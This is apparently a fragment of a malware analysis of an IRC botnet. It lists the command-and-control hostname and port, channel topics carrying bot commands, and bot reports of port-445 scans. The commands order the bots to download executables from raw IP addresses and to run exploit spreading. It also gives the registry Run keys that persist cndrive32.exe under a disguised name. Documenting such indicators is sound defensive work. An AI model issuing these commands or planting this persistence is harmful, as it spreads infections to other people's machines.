ms4alllll.tecBoom.com

ms4alllll.tecBoom.com:47221

Botnet C&C irc
o49949 changes topic to '.asc -S|.asc exp_all 25 2 0 -a -r|.asc exp_all 25 2 0 -b -r|.asc exp_all 25 2 0 -c'
* o49949 changes topic to 'finito'

Channels
/jojo #dpi
/jojo #a

.asc -S|.http http://208.53.183.164/httpd.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 25 5 0 -b|.asc exp_all 25 5 0 -c

Channel #-: ".asc -S|.http http://208.53.183.162/ma32ol.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 25 5 0 -b|.asc exp_all 25 5 0 -c"

Private Message to Channel #i: "HTTP SET http://208.53.183.162/ma32ol.exe" Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads." Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads." Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads." Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Trying to get external IP."

so that cndrive32.exe runs every time Windows starts
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
Microsoft Driver Setup = "%Windir%\cndrive32.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Microsoft Driver Setup = "%Windir%\cndrive32.exe"